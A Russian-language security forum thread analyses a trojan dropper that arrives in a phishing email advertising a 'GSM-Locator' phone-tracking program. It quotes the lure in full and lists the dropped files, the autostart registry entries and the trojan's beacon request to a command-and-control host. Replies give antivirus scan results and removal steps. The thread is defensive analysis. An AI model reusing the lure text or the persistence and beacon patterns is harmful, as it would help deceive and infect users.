# Форум на русском языке  > Угрозы информационной безопасности  > Вредоносные программы  > Описания вредоносных программ  >  Троян Trojan-Dropper.Win32.Delf - определение координат сотового телефона :)

## Зайцев Олег

Обнаружана рассылка писем с предложением испытать программу для определения координал GSM телефона. Это классика социальной инженерии, поэтому я приведу текст письма целиком:

********************** Начало письма ***********

GSM-Локатор v1.05
П р е д л а г а е м В а ш е м у в н и м а н и ю у н ик а л ь н у ю п р о г р а м м у GSM-Локатор версии 1.05. Данная программа позволяет определить местонахождение мобильного телефона в России и если подключена карта города (города, к которым имеются карты, представлены справа) где находится абонент, то спроецировать местоположение на карту. Если соответствующей карты нет, то отображается город/область местоположения телефона. Точность определения составляет:

для города - 10-20 метров (!)

для пригорода - от 100 до 200 метров, в зависимости от плотности расположения ретрансляторов оператора связи


На данный момент поддерживается определение местоположение сотовых телефонов всех операторов кроме Сонет . 
Для телефонов сети МТС и Билайн и их представительств в разных городах никаких ограничений по определению местоположения нет. При роуминге выводится информация о стране.

Для работы этой программы необходимо подключение к интернету. Минимальная конфигурация компьютера: Pentium 133, 16 Mb RAM, Windows 95/98/Me/NT/2000/XP.

Данная программа платная. Одна лицензия стоит 1500 рублей. 

Демо версию программы Вы можете скачать здесь  , она рассчитана на 24 часа полноценной работы с момента запуска.

Размер дистрибутива 135 Кб, без карт.

По вопросам приобретения звоните +7 (095) 508-11-86    

Примечание: разработчик программы снимает с себя ответственность за возможное нарушение закона при использовании данной программы.


********************** Конец письма ***********

К письму приложен файл GSM-Locator v1.05.exe размером 137216 байт. Файл ничем не сжат, написан на Delphi. Касперский опознает его как Trojan-Dropper.Win32.Delf.fr. По экспресс-анализу он и является дроппером, т.к. его задачей является помещение на компьютер нескольких троянов. В результате на компьютере в папке System появляется ряд файлов:
mstasks.exe - 43520 байт, TrojanDropper.Win32.Small.ne*** (в хвосте этого файла есть еще один)
sdchost.exe - 7004 байта, TrojanDownloader.Win32.Small.ub
sdchostc.exe - 12000 байта, сжат UPX, TrojanProxy.Win32.Daemonize.ab
sdchosts.exe - 17000 байта, сжат UPX, TrojanProxy.Win32.Daemonize.ab
sorte32.dll - 4000 байт, сжата UPX, TrojanDownloader.Win32.Small.ua
Стоит заметить, что все это "зверье" хранится внутри GSM-Locator v1.05.exe (они приписаны в хвост)
В ключе Run появляется две записи для автозагрузкит троянов:
"mstasks"="C:\\WINDOWS\\SYSTEM\\mstasks.exe"
"Direct settings"="C:\\WINDOWS\\SYSTEM\\sdchost.exe"
проявлением трояна является обмен с сайтом zsewaq3211.infobox.ru вида, который идет с периодически:
GET http://zsewaq3211.infobox.ru/script/...2120&Port2=121
22&ID=002900112004000700470030&L1=-.gif&L2=- HTTP/1.0..User-Agent: \..Host: zsewaq3211.infobox.ru

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## kps

Да, хитро придумано. Но у меня уже первая строка вызывает подозрение, что что-то здесь неладно, т.к. там слова написаны слитно и с пробелами между буквами. 



> П р е д л а г а е м В а ш е м у в н и м а н и ю у н ик а л ь н у ю п р о г р а м м у GSM-Локатор версии 1.05.

----------


## Minos

> Да, хитро придумано. Но у меня уже первая строка вызывает подозрение, что что-то здесь неладно, т.к. там слова написаны слитно и с пробелами между буквами.


Меня ни первая строка смутила, с ней как раз все впорядке - типичный спамерский прием, а содержание письма, а так же удаленный порт, через который предлагают скачать программу. Вот и запустил ее на виртуальной машине, подозрения подтвердились.

----------


## Geser

И мне уже пришло  :Smiley:

----------


## vicyo

НОД его видит как Win32/TrojanProxy.Daemonize.AA trojan.
За последние 2-3 недели, я четырежды встречал Win32/TrojanDropper.Delf и его модификацию в варезном софте, причём пара прог была скачана ещё 2-3 месяца назад. Этого трояна вставляют и в экзешник, и в кейджен и в типа плагин.

----------


## Geser

> НОД его видит как Win32/TrojanProxy.Daemonize.AA trojan.
> За последние 2-3 недели, я четырежды встречал Win32/TrojanDropper.Delf и его модификацию в варезном софте, причём пара прог была скачана ещё 2-3 месяца назад. Этого трояна вставляют и в экзешник, и в кейджен и в типа плагин.


Ну, не знаю пару месяцев или нет, но большинство антивирей его не знает:

Results of a file scan
This is the report of the scanning done over "GSMLocator11.05.zip" file that VirusTotal processed on 11/29/2004 at 20:42:36.
Antivirus Version Update Result 
AntiVir 6.28.0.12 11.29.2004 TR/Proxy.Daemoni.AB 
BitDefender 7.0 11.29.2004 - 
ClamWin devel-20041018 11.29.2004 - 
DrWeb 4.32b 11.29.2004 Trojan.MulDrop.1287 
eTrust-Iris 7.1.194.0 11.28.2004 - 
eTrust-Vet 11.7.0.0 11.29.2004 - 
F-Prot 3.15b 11.29.2004 - 
Kaspersky 4.0.2.24 11.29.2004 Trojan-Dropper.Win32.Delf.fr 
NOD32v2 1.935 11.26.2004 Win32/TrojanProxy.Daemonize.AA 
Norman 5.70.10 11.25.2004 - 
Panda 7.02.00 11.29.2004 - 
Sybari 7.5.1314 11.29.2004 MultiDropper-GP.d 
Symantec 8.0 11.28.2004 -

----------

Тема такая. У меня был MulDrop. Судя по публикации они похожи или одно и то же. Мой MulDrop делал так. Запускался system32\mstasks.exe. Там простенький раскидон на sdchost, sdchostc, sdchosts, sorty32.dll. Кажется так. Т.е. при запуске создаются эти файлы. Они - упакованные архивы. Создают в реестре ключ Software/Microsoft/Asdasdasd.. Что-то такое. И потом в инет ломятся. на info.. какой домен уже не помню  :Smiley: ) Так вот. Outpost отлично его мочит, не давая ломиться наружу, сам вирь тормозит на старте (SetTimer там стоит успеть чтобы размножиться) виндовса секунд 30. И Spider не запускается, то ли по таймауту, то ли его он мочит. Действия: удалить процессы sdchost*, удалить все указанные файлы (в т.ч. самый главный mstasks.exe) и из реестра из Local_machine/Software/microsoft/currentversion/run/ удалить запуск sdchost и mstasks. А свежий дрвеб сам вылечит  :Smiley:

----------

> Да, хитро придумано.


У меня sdchost.exe удалял cookies с машины, и я замаялся искать твикеры которые "это делают" - скачал пол-тонны софта в попытках найти галку стирающую cookies на машине. Ничего не нашел. Пока не скачал с sysinternals утилитку filemon и не увидел кто у меня эти cookies рубит.


А сейчас качаю drweb-а  :Smiley: ))))))))))))))))

----------

